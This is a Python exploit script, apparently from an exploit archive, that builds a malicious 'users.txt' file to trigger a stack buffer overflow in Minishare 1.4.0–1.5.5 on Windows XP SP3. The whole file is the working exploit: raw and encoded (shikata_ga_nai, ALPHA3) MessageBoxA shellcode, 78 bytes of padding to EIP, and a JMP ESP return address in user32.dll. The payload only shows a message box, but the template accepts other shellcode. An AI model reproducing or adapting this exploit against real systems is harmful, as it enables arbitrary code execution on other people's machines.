43 lines
No EOL
1.3 KiB
Python
Executable file
43 lines
No EOL
1.3 KiB
Python
Executable file
# Exploit Title: Minishare 1.5.5 Buffer Overflow Vulnerability (users.txt)
|
|
# Date: 11/02/2010
|
|
# Author: Chris Gabriel
|
|
# Software Link: http://sourceforge.net/projects/minishare
|
|
# Version: 1.4.0 - 1.5.5
|
|
# Tested on: Windows XP SP3 EN
|
|
# CVE:
|
|
|
|
# MessageBoxA TITLE=HAX TEXT=HAX WIN XP SP3 Shellcode
|
|
# \xbb\x48\x41\x58\x00\x53\x89\xe6\x31\xc0\x50\x56\x56\x50
|
|
# \xb8\xea\x07\x45\x7e\xff\xd0
|
|
|
|
# msfencoded MessageBoxA shellcode
|
|
# [*] x86/shikata_ga_nai succeeded with size 48 (iteration=1)
|
|
# \x33\xc9\xb1\x06\xda\xd2\xd9\x74\x24\xf4\x5b\xb8\x1f\xf9
|
|
# \xf2\x17\x83\xeb\xfc\x31\x43\x10\x03\x43\x0f\x1b\x07\xac
|
|
# \x67\x9a\xb0\xd3\x24\x95\xa7\xe5\x0a\xf5\x71\x50\xda\x4e
|
|
# \x97\x5b\x9f\xd0\x97\xb4
|
|
|
|
# ALPHA3.py x86 ascii uppercase ESP --input="shellcode-encoded"
|
|
# alpha3 encoded ascii uppercase MessageBoxA Shellcode
|
|
shellcode = (
|
|
"TYVTX10X41PZ41H4A4H1TA91TAFVTZ32PZNBFZDQE02D"
|
|
"QF0D13DJE1F4847029R9VNN0D668M194A0I5G5L2G3W3"
|
|
"M3Z19LN2A2Z1G0N2K0N4YK0JO9L9Q1S36403F0G3V2K1"
|
|
"Q9S123I1Y3N9R8M4E0G"
|
|
)
|
|
|
|
# 78 bytes till EIP
|
|
# 82 bytes till ESP
|
|
# 304 for payload
|
|
# EIP OVERWRITE
|
|
buff = "A" * 78
|
|
buff += "\x4b\x49\x48\x7e" #7E48494B JMP ESP in user32.dll win xp sp3
|
|
buff += shellcode
|
|
|
|
try:
|
|
f = open("users.txt",'w')
|
|
f.write(buff)
|
|
f.close()
|
|
print "[+] Vulnerable file created! Place the 'users.txt' file in the Minishare directory and run the program...\n"
|
|
except:
|
|
print "[-] Error occured!" |